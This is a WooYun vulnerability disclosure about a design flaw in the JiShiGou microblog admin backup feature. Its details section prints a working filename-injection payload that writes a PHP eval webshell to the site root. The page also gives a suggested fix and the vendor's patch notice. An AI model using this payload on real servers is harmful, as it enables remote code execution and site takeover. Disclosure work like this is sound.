当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08990

漏洞标题:记事狗微博后台拿shell

相关厂商:杭州神话

漏洞作者: lxsec

提交时间:2012-06-29 13:04

修复时间:2012-07-04 13:05

公开时间:2012-07-04 13:05

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-06-29: 细节已通知厂商并且等待厂商处理中
2012-07-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

记事狗微博系统,后台存在设计缺陷,可导致进入后台者获得shell

详细说明:

1.系统工具->数据备份->自定义备份->选择一张数据量较小的表->更多选项->选择压缩备份文件->多分卷压缩成一个文件
2.在备份文件名中输入
');file_put_contents(base64_decode('YS5waHA='),base64_decode('PD9waHAgZXZhbCgkX1BPU1RbYV0pPz4='));('
备份成功就在网站根目录生成a.php,内容为<?php eval($_POST[a])?>
其中base64_decode中编码自己改吧

漏洞证明:



修复方案:

备份文件名输入验证,过滤字符

版权声明:转载请注明来源 lxsec@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-07-04 13:05

厂商回复:

漏洞Rank:13 (WooYun评价)

最新状态:

2012-07-09:感谢漏洞提供者@lxsec ,此漏洞由于后台过滤不严谨造成,已经在最新版本修复,请升级到3.6.0版本即可。另外在此对由于此未能及时确认漏洞和对漏洞进行评级造成提供者没有获得相应的rank值深表歉意,在以后的工作中我们会改进完善相应的漏洞处理机制,再次感谢白帽子们


漏洞评价:

评论

  1. 2012-06-29 13:59 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    恭喜被批。。

  2. 2012-06-29 16:43 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    上来就被劈

  3. 2012-06-29 17:14 | testcvc ( 路人 | Rank:5 漏洞数:1 | test)

    坐等可以直接getshel的漏洞……

  4. 2012-06-29 17:17 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:39 | 道生一,一生二,二生三,三生万物,万物负...)

    强烈关注.....

  5. 2012-06-30 15:36 | Say ( 路人 | Rank:17 漏洞数:4 | 谁又会鉴定谁正常?)

    这个好像很早就有exp了?

  6. 2012-07-05 10:34 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

    这个思路不错啊。

  7. 2012-07-11 11:38 | ccSec ( 实习白帽子 | Rank:48 漏洞数:4 | ^^)

    ...

  8. 2013-09-06 01:24 | zsmynl ( 路人 | Rank:15 漏洞数:2 | 非土豪一枚~)

    look and see。